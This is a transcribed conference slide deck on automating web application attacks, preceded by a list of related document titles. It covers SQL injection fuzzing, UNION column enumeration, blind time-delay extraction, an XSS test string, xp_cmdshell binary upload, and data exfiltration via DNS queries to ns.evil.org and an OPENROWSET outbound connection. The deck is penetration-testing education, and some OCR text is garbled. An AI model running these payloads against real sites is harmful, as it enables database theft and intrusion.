Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Gotham Digital Science Ltd

Similar documents
Automated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation

Web Application Penetration Testing

Penetration Testing. James Walden Northern Kentucky University

WEB APPLICATION SCANNERS. Evaluating Past the Base Case

A D V I S O R Y S E R V I C E S. Web Application Assessment

Web Application Attacks

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Penetration Testing with Kali Linux

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

Web Application Security

CNIT 129S: Securing Web Applications. Ch 4: Mapping the Application

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

Mavituna Security Ltd. Finance House, 522A Uxbridge Rd. Pinner. HA5 3PU / UK

Secure Parameter Filter (SPF) (AKA Protecting Vulnerable Applications with IIS7) Justin Clarke, Andrew Carey Nairn

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Scan Report Executive Summary

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

Some Facts Web 2.0/Ajax Security

String Analysis for the Detection of Web Application Flaws

SQL Injection Attacks and Defense

Portcullis Computer Security.

Exam Questions v8

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web Penetration Testing

Securing ArcGIS Services

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

WebGoat Lab session overview

CS 155 Project 2. Overview & Part A

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Web Programming Paper Solution (Chapter wise)

Solutions Business Manager Web Application Security Assessment

EasyCrypt passes an independent security audit

Injectable Exploits. New Tools for Pwning Web Apps and Browsers

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center

Application vulnerabilities and defences

Lecture 9a: Sessions and Cookies

Introduction to Ethical Hacking

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Host Website from Home Anonymously

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Checklist for Testing of Web Application

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Web Applilicati tion S i ecur t ity SIRT Se u c i r ty ity T a r i aining April 9th, 2009

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Scan Report Executive Summary. Part 2. Component Compliance Summary Component (IP Address, domain, etc.):ekk.worldtravelink.com

Securing Apache Tomcat. AppSec DC November The OWASP Foundation

Web Security. Thierry Sans

Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address :

Information Security. Gabriel Lawrence Director, IT Security UCSD

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Online Intensive Ethical Hacking Training

Probabilistic Attack Planning in Network + WebApps Scenarios

INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING

CS 161 Computer Security

SQL Injection how far does the rabbit hole go? OWASP 5 November The OWASP Foundation

A framework to 0wn the Web - part I -

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.

NET 311 INFORMATION SECURITY

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

RTView Data Server SL Corporation. All Rights Reserved Sherrill-Lubinski Corporation. All Rights Reserved.

Session 8. Reading and Reference. en.wikipedia.org/wiki/list_of_http_headers. en.wikipedia.org/wiki/http_status_codes

CERTIFICATE IN WEB PROGRAMMING

ICS 351: Today's plan. IPv6 routing protocols (summary) HTML HTTP web scripting languages certificates (review) cookies

The OWASP Foundation

Web Application Security. Philippe Bogaerts

SAP Automation (BC-FES-AIT)

Web Application Security. OWASP 11 th August, The OWASP Foundation Basic SQL injection Basic Click Jacking

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Finding Vulnerabilities in Source Code

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Notes From The field

Computer Networks. Wenzhong Li. Nanjing University

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Secure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 -

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Human vs Artificial intelligence Battle of Trust

ICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder

CSE 127 Computer Security

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Applications Security

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Configuring User Defined Patterns

FlightPATH. User Manual:

eb Security Software Studio

Securing ArcGIS Server Services An Introduction

Sichere Software vom Java-Entwickler

Transcription:

Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science

Why this talk? The techniques are well known, but how about some way of applying ppy them? Commercial tools are available, but expensive. Is there some way we can write something Open Source? Automated exploit tools are in use in the wild 2

What we re covering today Practical web application scanning Automating exploitation Other web application exploitation techniques that t automate t well 3

Practical automated t web application scanning 4

What are we testing? Even with Black Box we can potentially interact with any ypart of the architecture 1. Client 2. Web Server 3. Middle Tier 4. Database Ports 80/443 IIS Apache Netscape ASP.NET JSP Java IIS Apache EJB ASP/.NET SOAP.NET Remoting DCOM CORBA Client Browser The Web Application Data Flow 5

What are we testing? (cont) Input parsing Input validation State management Output generation 6

Testing Approach Anomaly testing Expected result, introduce anomaly, compare results Testing the attack surface of the application Using valid information Fuzzing one parameter at a time Fairly reliable 7

What do we need? Attack surface Complete every accessible page and parameter Log of user session Should be entirely valid Figure out how the application maintains sessions Cookie? Parameter? 8

Getting the Attack Surface Parsing HTML has problems Non compliant HTML Javascript links and functionality Local proxy benefits Capture entire valid request Capture valid session credentials 9

Alternatives to a local proxy Capture/MITM traffic Ethereal / Wireshark More exotic solutions for SSL ie, SSL mitm, kapimon etc Hooking IE events via COM IEnterceptor (from my site) 10

Intelligent Fuzzing Testing for SQL injection / Cross Site Scripting Send test request with all valid parameters Send request with single parameter fuzzed Compare fuzzed response with valid response Return code 200 v 500, 200 v 302? Error messages unhandled or handled by application Size of response significantly ifi bigger/smaller? Clearly exploitable/exploited testing returned unfiltered 11

Intelligent Fuzzing (cont) Error reduction/inference If we make the error go away, we have something valid Test for SQL/XML injection termination and syntax ie, ) )) ))) etc etc 12

Demo simplescanner.pl Basic web app scanner by Brian Holyfield Flags database errors, writeable/browsable directories, basic cross site scripting Get it from http://examples.oreilly.com/networkst/ / / 13

How does it work? Uses te'st as a SQL Injection anomaly If a database error is returned, flags a potential SQL injection issue Uses "><DEFANGED_script>alert('Vulnerable'); </script> as a XSS anomaly If XSS anamoly is returned intact in the response, flags a potential XSS 14

Automating ti exploitation ti 15

Terminating the SQL Try appending SQL termination strings until we find one that works 1 1 1) 1 ) 1)) 1 )) Also 1=1 syntax 16

Finding SQL Unions Blind SQL Injection column enumeration techniques very useful From http://www.imperva.com (Ofer Maor and Amichai Shulman) Use ORDER BY queries to determine how many columns are in the original query too many will give an error (also works for XPath) Use database specific trickery to get data type Guess one column data type at a time and fill the rest with NULL (recent Oracle and SQL Server) Use a CONVERT to force data to a known data type 17

Finding SQL Unions (cont) Using NULL as a placeholder ' union select 1,null,null... - no error numeric ' union select 1,2,null... - error no numeric ' union select 1,'2',null... - no error string SQL Server and modern Oracle Use convert() or cast() ' union select convert(varchar,1)... Early Oracle versions brute force 18

Demo extendedscanner.pl Builds on simplescanner.pl (also by Brian Holyfield) Flags database errors, application errors, writeable/browsable directories, basic cross site scripting Basic SQL injection inference-based exploit generator for union queries, including some blind SQL injection techniques Get it from http://examples.oreilly.com/networkst 19

How does it work? Uses te'st as a SQL Injection anomaly If error returned from SQL anomaly, kicks in exploit engine Uses blind SQL injection techniques to find columns Uses NULL and type guessing to match data types Returns SQL injection example strings that appeared to have worked (no error from application) XSS functionality same as simplescanner.pl 20

What doesn't it do? Logic based blind detection foo.asp?id=99+1 instead of foo.asp?id=100 Intelligent cross site scripting detection Other techniques that automate well URL redirection detection File download detection XPath injection detection Finding backup files Forceful browsing testing 21

Extending extendedscanner.pl URL redirection Look for 302 and location headers coming back from server File download Try../.. etc logic, try to download source files Backup files Mutate files with.old,.bak etc Forceful browsing Request with and without session cookies 22

Other web application exploitation ti techniques 23

Other Useful Techniques Force data to be returned in an error message From http://www.nextgenss.com (Chris Anley) Force data to be returned by converting string to integer i.e. convert(int,username) Can then use a where > to find the next value i.e. SQL Server - ; union select... where foo > 'admin'-- ' 24

Other Useful Techniques (cont) Ask Yes/No questions of the backend DB to bruteforce out data Time delay for SQL Server using waitfor delay also noted by Chris Anley Analysing differences in pages coming back from asking known true/false queries (i.e. AND 1=1, AND 1=2 and OR 1=1, OR 1=2) Absinthe from http://www.0x90.org SQLBrute.py 25

Demo sqlbrute.py From my site Written for a specific situation (Oracle backend, with no or + allowed in the query) This is why the exploit syntax uses chained CHAR() and CONCAT() statements Supports error based SQL Server and Oracle (via regex) and waitfor delay testing for SQL Server 26

How does it work? Asks yes/no questions (in where clauses) For where parameter we're fuzzing is valid ' and exists (select from database table where first letter is 'A') For where parameter is invalid ' or exists (select from database table where first letter is 'A') Time based testing ; if exists (select from database table where first letter is 'A') A) waitfor delay 5 seconds 27

Extending SQLBrute technique Test via binary data (i.e. Chris Anley paper) p Can reconstruct more than numeric/alpha Test via more than/less than Test < 'N', then < 'H' etc 28

Other Useful Techniques (cont) Binary upload and reassembly Upload file as text via OS functionality (i.e. xp_cmdshell for SQL Server) Shar archive for Unix Debug.exe commands for Windows (encode using unidebug from packetstorm) Execute using exploited OS functionality 29

Other Useful Techniques (cont) Alternative communication channels Send database data out via DNS queries, using OS or alternative database access Query ns.evil.org for each item in the table Capture data from your DNS server Outbound connections ie i.e. SQLServer- Server '; insert into OPENROWSET('SQLoledb' SQLoledb, 'uid=<account>;pwd=<pwd>;network=dbmssocn;address =<my ip>,<port>;', 'select * from ') select * from -- 30

Links/Contact Info Examples, and chapter about design of simplescanner, are downloadable from the Network Security tools page at: http://www.oreilly.com/catalog/networkst IEnterceptor, SQLbrute, this deck and some other random stuff are available at http://www.justinclarke.com justin@gdssecurity.com it com PGP - 0C3F 8FE5 DC79 2F97 877E 8964 70C4 4F13 C923 8E05 justin@justinclarke.com PGP - EB12 4673 3180 9389 B291 1008 B3D0 1BE3 7D65 112D 31

Questions 32

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback